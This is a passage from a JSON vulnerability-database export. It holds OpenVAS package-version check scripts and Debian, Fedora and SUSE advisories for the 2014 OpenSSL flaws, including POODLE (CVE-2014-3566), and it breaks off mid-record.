["http://www.debian.org/security/2014/dsa-3053.html"], "pluginID": "1361412562310703053", "description": "Several vulnerabilities have been found in OpenSSL, the Secure Sockets\nLayer library and toolkit.\n\nCVE-2014-3513 \nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server.\n\nCVE-2014-3566 (", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-10-16T00:00:00", "title": "Debian Security Advisory DSA 3053-1 (openssl - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310703053", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703053", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3053.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3053-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703053\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n script_name(\"Debian Security Advisory DSA 3053-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-10-16 00:00:00 +0200 (Thu, 16 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3053.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u13.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1j-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been found in OpenSSL, the Secure Sockets\nLayer library and toolkit.\n\nCVE-2014-3513 \nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server.\n\nCVE-2014-3566 ('POODLE') \nA flaw was found in the way SSL 3.0 handled padding bytes when\ndecrypting messages encrypted using block ciphers in cipher block\nchaining (CBC) mode. This flaw allows a man-in-the-middle (MITM)\nattacker to decrypt a selected byte of a cipher text in as few as 256\ntries if they are able to force a victim application to repeatedly send\nthe same data over newly created SSL 3.0 connections. \n\nThis update adds support for Fallback SCSV to mitigate this issue.\n\nCVE-2014-3567 \nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large number\nof invalid session tickets to that server. \n\nCVE-2014-3568 \nWhen OpenSSL is configured with 'no-ssl3' as a build option, servers\ncould accept and complete a SSL 3.0 handshake, and clients could be\nconfigured to send them.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u13\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:53:26", "references": ["2014-15390", "https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146244.html"], "pluginID": "1361412562310868601", "description": "Check the version of nodejs", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-12-15T00:00:00", "title": "Fedora Update for nodejs FEDORA-2014-15390", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-08-23T00:00:00", "id": "OPENVAS:1361412562310868601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868601", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nodejs FEDORA-2014-15390\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868601\");\n script_version(\"$Revision: 6995 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-23 13:52:03 +0200 (Wed, 23 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-15 05:56:45 +0100 (Mon, 15 Dec 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for nodejs FEDORA-2014-15390\");\n script_tag(name: \"summary\", value: \"Check the version of nodejs\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Node.js is a platform built on Chrome's JavaScript runtime\nfor easily building fast, scalable network applications.\nNode.js uses an event-driven, non-blocking I/O model that\nmakes it lightweight and efficient, perfect for data-intensive\nreal-time applications that run across distributed devices.\n\");\n script_tag(name: \"affected\", value: \"nodejs on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15390\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146244.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"nodejs\", rpm:\"nodejs~0.10.33~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:53:56", "references": ["2014-15379", "https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146233.html"], "pluginID": "1361412562310868604", "description": "Check the version of nodejs", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-12-15T00:00:00", "title": "Fedora Update for nodejs FEDORA-2014-15379", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310868604", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868604", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nodejs FEDORA-2014-15379\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868604\");\n script_version(\"$Revision: 6750 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-15 05:56:50 +0100 (Mon, 15 Dec 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for nodejs FEDORA-2014-15379\");\n script_tag(name: \"summary\", value: \"Check the version of nodejs\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Node.js is a platform built on Chrome's JavaScript runtime\nfor easily building fast, scalable network applications.\nNode.js uses an event-driven, non-blocking I/O model that\nmakes it lightweight and efficient, perfect for data-intensive\nreal-time applications that run across distributed devices.\n\");\n script_tag(name: \"affected\", value: \"nodejs on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15379\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146233.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"nodejs\", rpm:\"nodejs~0.10.33~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:55:23", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143135.html", "2014-14234"], "pluginID": "1361412562310868471", "description": "Check the version of claws-mail", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-11-11T00:00:00", "title": "Fedora Update for claws-mail FEDORA-2014-14234", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:1361412562310868471", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868471", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for claws-mail FEDORA-2014-14234\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868471\");\n script_version(\"$Revision: 6663 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-11 06:21:35 +0100 (Tue, 11 Nov 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for claws-mail FEDORA-2014-14234\");\n script_tag(name: \"summary\", value: \"Check the version of claws-mail\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Claws Mail is an email client (and news reader), based on GTK+, featuring\nquick response, graceful and sophisticated interface, easy configuration,\nintuitive operation, abundant features, and extensibility.\n\");\n script_tag(name: \"affected\", value: \"claws-mail on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-14234\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143135.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"claws-mail\", rpm:\"claws-mail~3.11.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:48:25", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=1960c50f351e883d9bffe5194436ac38", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-doc", "packageFilename": "openssl-doc-0.9.8a-18.86.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel-32bit", "packageFilename": "openssl-devel-32bit-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-32bit", "packageFilename": "openssl-32bit-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8a-18.86.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-doc", "packageFilename": "openssl-doc-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-doc", "packageFilename": "openssl-doc-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel-32bit", "packageFilename": "openssl-devel-32bit-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-32bit", "packageFilename": "openssl-32bit-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete ((CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>&gt;\n * CVE-2014-3566\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>&gt;\n * CVE-2014-3568\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>&gt;\n", "edition": 1, "reporter": "Suse", "published": "2014-11-11T01:04:46", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "Security update for OpenSSL (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-11T01:04:46", "id": "SUSE-SU-2014:1387-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00007.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:16", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=e15c3470343095d331f7120ec6953c18", "https://bugzilla.suse.com/show_bug.cgi?id=892403", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl-doc", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.ppc64.rpm", "packageName": "openssl", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl0_9_8", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-x86-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl0_9_8-x86", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": 